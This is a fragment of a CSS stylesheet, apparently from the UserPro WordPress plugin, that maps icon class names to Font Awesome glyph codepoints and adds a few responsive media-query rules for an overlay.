.userpro-icon-trademark:before{content:"\f25c";} .userpro-icon-registered:before{content:"\f25d";} .userpro-icon-creative-commons:before{content:"\f25e";} .userpro-icon-gg:before{content:"\f260";} .userpro-icon-gg-circle:before{content:"\f261";} .userpro-icon-tripadvisor:before{content:"\f262";} .userpro-icon-odnoklassniki:before{content:"\f263";} .userpro-icon-odnoklassniki-square:before{content:"\f264";} .userpro-icon-get-pocket:before{content:"\f265";} .userpro-icon-wikipedia-w:before{content:"\f266";} .userpro-icon-safari:before{content:"\f267";} .userpro-icon-chrome:before{content:"\f268";} .userpro-icon-firefox:before{content:"\f269";} .userpro-icon-opera:before{content:"\f26a";} .userpro-icon-internet-explorer:before{content:"\f26b";} .userpro-icon-tv:before, .userpro-icon-television:before{content:"\f26c";} .userpro-icon-contao:before{content:"\f26d";} .userpro-icon-500px:before{content:"\f26e";} .userpro-icon-amazon:before{content:"\f270";} .userpro-icon-calendar-plus-o:before{content:"\f271";} .userpro-icon-calendar-minus-o:before{content:"\f272";} .userpro-icon-calendar-times-o:before{content:"\f273";} .userpro-icon-calendar-check-o:before{content:"\f274";} .userpro-icon-industry:before{content:"\f275";} .userpro-icon-map-pin:before{content:"\f276";} .userpro-icon-map-signs:before{content:"\f277";} .userpro-icon-map-o:before{content:"\f278";} .userpro-icon-map:before{content:"\f279";} .userpro-icon-commenting:before{content:"\f27a";} .userpro-icon-commenting-o:before{content:"\f27b";} .userpro-icon-houzz:before{content:"\f27c";} .userpro-icon-vimeo:before{content:"\f27d";} .userpro-icon-black-tie:before{content:"\f27e";} .userpro-icon-fonticons:before{content:"\f280";} .userpro-icon-reddit-alien:before{content:"\f281";} .userpro-icon-edge:before{content:"\f282";} .userpro-icon-credit-card-alt:before{content:"\f283";} .userpro-icon-codiepie:before{content:"\f284";} .userpro-icon-modx:before{content:"\f285";} .userpro-icon-fort-awesome:before{content:"\f286";} .userpro-icon-usb:before{content:"\f287";} .userpro-icon-product-hunt:before{content:"\f288";} .userpro-icon-mixcloud:before{content:"\f289";} .userpro-icon-scribd:before{content:"\f28a";} .userpro-icon-pause-circle:before{content:"\f28b";} .userpro-icon-pause-circle-o:before{content:"\f28c";} .userpro-icon-stop-circle:before{content:"\f28d";} .userpro-icon-stop-circle-o:before{content:"\f28e";} .userpro-icon-shopping-bag:before{content:"\f290";} .userpro-icon-shopping-basket:before{content:"\f291";} .userpro-icon-hashtag:before{content:"\f292";} .userpro-icon-bluetooth:before{content:"\f293";} .userpro-icon-bluetooth-b:before{content:"\f294";} .userpro-icon-percent:before{content:"\f295";} .userpro-icon-gitlab:before{content:"\f296";} .userpro-icon-wpbeginner:before{content:"\f297";} .userpro-icon-wpforms:before{content:"\f298";} .userpro-icon-envira:before{content:"\f299";} .userpro-icon-universal-access:before{content:"\f29a";} .userpro-icon-wheelchair-alt:before{content:"\f29b";} .userpro-icon-question-circle-o:before{content:"\f29c";} .userpro-icon-blind:before{content:"\f29d";} .userpro-icon-audio-description:before{content:"\f29e";} .userpro-icon-volume-control-phone:before{content:"\f2a0";} .userpro-icon-braille:before{content:"\f2a1";} .userpro-icon-assistive-listening-systems:before{content:"\f2a2";} .userpro-icon-asl-interpreting:before, .userpro-icon-american-sign-language-interpreting:before{content:"\f2a3";} .userpro-icon-deafness:before, .userpro-icon-hard-of-hearing:before, .userpro-icon-deaf:before{content:"\f2a4";} .userpro-icon-glide:before{content:"\f2a5";} .userpro-icon-glide-g:before{content:"\f2a6";} .userpro-icon-signing:before, .userpro-icon-sign-language:before{content:"\f2a7";} .userpro-icon-low-vision:before{content:"\f2a8";} .userpro-icon-viadeo:before{content:"\f2a9";} .userpro-icon-viadeo-square:before{content:"\f2aa";} .userpro-icon-snapchat:before{content:"\f2ab";} .userpro-icon-snapchat-ghost:before{content:"\f2ac";} .userpro-icon-snapchat-square:before{content:"\f2ad";} .userpro-icon-pied-piper:before{content:"\f2ae";} .userpro-icon-first-order:before{content:"\f2b0";} .userpro-icon-yoast:before{content:"\f2b1";} .userpro-icon-themeisle:before{content:"\f2b2";} .userpro-icon-google-plus-circle:before, .userpro-icon-google-plus-official:before{content:"\f2b3";} .userpro-icon-fa:before, .userpro-icon-font-awesome:before{content:"\f2b4";} .userpro-icon-handshake-o:before{content:"\f2b5";} .userpro-icon-envelope-open:before{content:"\f2b6";} .userpro-icon-envelope-open-o:before{content:"\f2b7";} .userpro-icon-linode:before{content:"\f2b8";} .userpro-icon-address-book:before{content:"\f2b9";} .userpro-icon-address-book-o:before{content:"\f2ba";} .userpro-icon-vcard:before, .userpro-icon-address-card:before{content:"\f2bb";} .userpro-icon-vcard-o:before, .userpro-icon-address-card-o:before{content:"\f2bc";} .userpro-icon-user-circle:before{content:"\f2bd";} .userpro-icon-user-circle-o:before{content:"\f2be";} .userpro-icon-user-o:before{content:"\f2c0";} .userpro-icon-id-badge:before{content:"\f2c1";} .userpro-icon-drivers-license:before, .userpro-icon-id-card:before{content:"\f2c2";} .userpro-icon-drivers-license-o:before, .userpro-icon-id-card-o:before{content:"\f2c3";} .userpro-icon-quora:before{content:"\f2c4";} .userpro-icon-free-code-camp:before{content:"\f2c5";} .userpro-icon-telegram:before{content:"\f2c6";} .userpro-icon-thermometer-4:before, .userpro-icon-thermometer:before, .userpro-icon-thermometer-full:before{content:"\f2c7";} .userpro-icon-thermometer-3:before, .userpro-icon-thermometer-three-quarters:before{content:"\f2c8";} .userpro-icon-thermometer-2:before, .userpro-icon-thermometer-half:before{content:"\f2c9";} .userpro-icon-thermometer-1:before, .userpro-icon-thermometer-quarter:before{content:"\f2ca";} .userpro-icon-thermometer-0:before, .userpro-icon-thermometer-empty:before{content:"\f2cb";} .userpro-icon-shower:before{content:"\f2cc";} .userpro-icon-bathtub:before, .userpro-icon-s15:before, .userpro-icon-bath:before{content:"\f2cd";} .userpro-icon-podcast:before{content:"\f2ce";} .userpro-icon-window-maximize:before{content:"\f2d0";} .userpro-icon-window-minimize:before{content:"\f2d1";} .userpro-icon-window-restore:before{content:"\f2d2";} .userpro-icon-times-rectangle:before, .userpro-icon-window-close:before{content:"\f2d3";} .userpro-icon-times-rectangle-o:before, .userpro-icon-window-close-o:before{content:"\f2d4";} .userpro-icon-bandcamp:before{content:"\f2d5";} .userpro-icon-grav:before{content:"\f2d6";} .userpro-icon-etsy:before{content:"\f2d7";} .userpro-icon-imdb:before{content:"\f2d8";} .userpro-icon-ravelry:before{content:"\f2d9";} .userpro-icon-eercast:before{content:"\f2da";} .userpro-icon-microchip:before{content:"\f2db";} .userpro-icon-snowflake-o:before{content:"\f2dc";} .userpro-icon-superpowers:before{content:"\f2dd";} .userpro-icon-wpexplorer:before{content:"\f2de";} .userpro-icon-meetup:before{content:"\f2e0";} @media only screen and (min-width: 1024px) and (max-width: 1300px) { } @media only screen and (min-width: 768px) and (max-width: 1024px) { } @media only screen and (min-width: 480px) and (max-width: 767px) { } @media only screen and (max-width: 479px) { div.userpro-overlay-inner { width: 90%; margin-left: 5%; left: 0; } }